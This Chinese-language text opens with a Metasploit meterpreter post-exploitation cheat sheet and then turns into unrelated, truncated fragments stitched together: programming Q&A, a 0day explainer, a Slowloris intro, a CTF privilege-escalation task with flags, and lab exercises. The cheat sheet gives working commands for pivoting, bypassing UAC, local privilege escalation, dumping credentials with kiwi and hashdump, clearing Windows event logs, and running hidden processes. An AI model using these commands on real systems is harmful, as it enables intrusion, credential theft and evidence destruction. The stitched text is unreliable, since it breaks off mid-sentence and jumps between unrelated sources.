msf提供了非常强大的后渗透工具-meterpreter.获取目标机的meterpreter后有以下优势
通过浏览器的shell可能是一个脆弱的shell,将shell和一个稳定的进程绑定到一起,就不需要对磁盘进行任何写入操作.
1.meterpreter手工迁移
getpid命令查看自己的pid是多少
#迁移进程 找到一些比较经常出现在进程而且较稳定的服务进行迁移
migrate pid
#原本的进程会自动关闭,为了确保不存在最好再使用kill -9 pid强制删除
2.msf利用模块迁移
run post/windows/manage/migrate
1.收集系统信息
sysinfo
2.查看网络设置
route
3.查看当前权限
getuid
4.查看网络结构
先进行跳转,输入background将meterpreter中断隐藏在后台
route add命令添加路由,
meterpreter > background
backgrounding session 1 . . .
msf > route add 192.168.1.0 255.255.255.0 1(session 1的意思)
msf > route print
active routing table
subnet netmask gateway
192.168.1.0 255.255.255.0 session 1
ipconfig/ifconfig
arp -a
netstat -ano
getproxy #查看代理信息
route #路由
portfwd add -l 6666 -p 3389 - r 127.0.0.1 #将目标机的3389端口转发到本地6666端口
run get_local_subnets
run autoroute -s 192.168.1.0/24 #添加到目标环境网络
run autoroute -p #查看添加的路由
autoroute添加完路由后,利用msf自带的socks4a代理
msf > use auxiliary/server/socks4a
msf > set srvhost 127.0.0.1
msf > set srvport 1080
msf > run
vi /etc/proxychains.conf
socks4 127.0.0.1 1080
利用proxichains 访问
getsystem提权
bypassuac提权
search bypassuac
有以下几个
再次执行getsystem获取系统权限
先用enum_patches收集补丁信息,查找可用的exploit进行提权
search enum_patches
meterpreter > run post/windows/gather/enum_patches #查看补丁信息
msf > use exploit/windows/localms13_053_schlamperei
msf > set session 2
msf > exploit
1.查看当前处于目标机的哪个目录
pwd / getwd
getlwd:查看当前处于本地的某个目录
ls:列出当前目录所有文件
2.搜索指定类型的文件
search -f *.txt -d c:\
-f 用于指定搜索文件 -d 指定哪个目录下进行搜索
3.下载文件
download 目标机文件 攻击机目录
download c:\test.txt /root
4.上传文件
upload 攻击机文件 目标机路径
5在目标机切换目录
lcd /tmp #操作攻击者主机 切换目录
mimikatz抓
load kiwi
creds_all
1.hashdump
2.run windows/gather/smart_hashdump
3.run windows/gather/credentials/windows_autologin
clearev #清除windows中的应用程序日志、系统日志、安全日志
execute #在目标机中执行文件
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
判断是否为多网卡机器扫描其他网段
尽量收集机器上的敏感信息,敏感内部文件,账号密码本等
1.抓取自动登录的密码
run windows/gather/credentials/windows_autologin #抓取用户存储的自动登录账户密码
2导出密码hash
hashdump
3.查看权限后,抓取密码
getuid

什么是0day漏洞?0day漏洞,是指已经被发现,但是还未被公开,同时官方还没有相关补丁的漏洞;通俗的讲,就是除了黑客,没人知道他的存在,其往往具有很大的突发性、破坏性、致命性。0day漏洞之所以称为0day,正是因为其补丁永远晚于攻击。所以攻击者利用0day漏洞攻击的成功率极高,往往可以达到目的并全身而退,而防守方却一无所知,只有在漏洞公布之后,才后知后觉,却为时已晚。“后知后觉、反应迟钝”就是当前安全防护面对0day攻击的真实写照!为了方便大家理解,中科三方为大家梳理当前安全防护模式下,一个漏洞从发现到解决的三个时间节点:T0:此时漏洞即0day漏洞,是已经被发现,还未被公开,官方还没有相
关闭。这个问题是opinion-based.它目前不接受答案。想要改进这个问题?更新问题,以便editingthispost可以用事实和引用来回答它.关闭9年前。Improvethisquestion首先,我想避免一场关于语言的口水战。可供选择的语言有Perl、Python和Ruby。我想提一下,我对所有这些都很满意,但问题是我不能只专注于一个。例如,如果我看到一个很棒的Perl模块,我必须尝试一下。如果我看到一个不错的Python应用程序,我必须知道它是如何制作的。如果我看到RubyDSL或一些Ruby巫术,我就会迷上Ruby一段时间。目前我是一名Java开发人员,但计划在不久的将来
前言 Slowloris攻击是我在李华峰老师的书——《MetasploitWeb 渗透测试实战》里面看的,感觉既简单又使用,现在这种攻击是很容易被防护的啦。不过我也不敢真刀实战的去试,只是拿个靶机玩玩罢了。 废话还是写在结语里面吧。(划掉)结语可以不看(划掉)Slowloris攻击的原理 Slowloris是一种资源消耗类DoS攻击,它利用部分HTTP请求进行操作。也叫做慢速攻击,这里的慢速并不是说发动攻击慢,而是访问一条链接的速度慢。Slowloris攻击的功能是打开与目标Web服务器的连接,然后尽可能长时间的保持这些连接打开。如果由多台电脑同时发起Slo
我正在使用https://github.com/kickstarter/rack-attack/#throttles限制对某些网址的请求。机架攻击文档展示了如何通过请求IP或请求参数进行限制,但我想做的是限制每个用户的请求。因此,无论IP是什么,用户都应该能够在特定时间范围内发出不超过n个请求。我们使用devise进行身份验证,我想不出一种简单的方法来根据请求唯一标识用户。我应该在session/cookie中存储用户ID吗?也许是一个uniq哈希?您对实现这一目标的最佳方式有何看法? 最佳答案 想通了。Devise已将用户ID存储
我正在尝试为像这样的ActiveRecord模型提供一组非常通用的命名范围:moduleScopesdefself.included(base)base.class_evaldonamed_scope:not_older_than,lambda{|interval|{:conditions=>["#{table_name}.created_at>=?",interval.ago]}endendendActiveRecord::Base.send(:include,Scopes)classUser如果命名范围应该是通用的,我们需要指定*table_name*以防止命名问题,如果它们是来自
B-3:Linux系统渗透提权任务环境说明:服务器场景:Server2204(关闭链接)用户名:hacker密码:123456使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;Flag:2283/tcp使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;Flag:KipZ1eze使用渗透机对服务器信息收集&
继Heartbleed错误之后,thispostonruby-lang.org描述了如何检查漏洞和升级。它包括这个建议:要验证您链接到Ruby的OpenSSL库版本,请使用以下命令:ruby-v-ropenssl-rfiddle-e'putsFiddle::Function.new(Fiddle.dlopen(nil)["SSLeay_version"],[Fiddle::TYPE_INT],Fiddle::TYPE_VOIDP).call(0)'要验证当前随Ruby安装的OpenSSL版本,请使用以下命令:ruby-ropenssl-e'putsOpenSSL::OPENSSL_VE
我正在开发一个网络应用程序,用户可以在其中回复博客条目。这是一个安全问题,因为它们可以发送将呈现给其他用户(并由javascript执行)的危险数据。他们无法格式化他们发送的文本。没有“粗体”,没有颜色,什么都没有。只是简单的文字。我想出了这个正则表达式来解决我的问题:[^\\w\\s.?!()]因此,任何不是单词字符(a-Z、A-Z、0-9)、不是空格、“.”、“?”、“!”、“(”或“)”的内容都将被替换为空字符字符串。每个引号都将替换为:“"”。我在前端检查数据,在我的服务器上检查。有人可以绕过这个“解决方案”吗?我想知道StackOverflow是如何做这件事的?这里有
Kali渗透测试:网络数据的嗅探与欺骗无论什么样的漏洞渗透模块,在网络中都是以数据包的形式传输的,因此如果我们能够对网络中的数据包进行分析,就可以掌握渗透的原理。另外,很多网络攻击的方法也都是发送精心构造的数据包来完成的,如常见的ARP欺骗。利用这种欺骗方式,黑客可以截获受害计算机与外部通信的全部数据,如受害者登录使用的用户名与密码、发送的邮件等。“Thequieteryouarethemoreyouareabletohear”(你越安静,你能听到的越多)。如使用HTTP、FTP或者Telnet等协议所传输等数据都是明文传输的,一旦数据包被监听,里面的信息就会被泄漏。而这一切并不难做到,任何一
1.实验目的和要求理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。系统环境:KaliLinux2、Windows网络环境:交换网络结构实验工具:Metasploitable2(需自行下载虚拟机镜像);Nmap(Kali);WinHex、数据恢复软件等实验步骤1、用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“networksecurity”的pdf文档,截图搜索得到的页面。答:利用搜索引擎语言就能找到符合题目要求的文档。2、照片中的女生在哪里旅行?截图搜索到的地址信息。答:可以注意到图片中出现最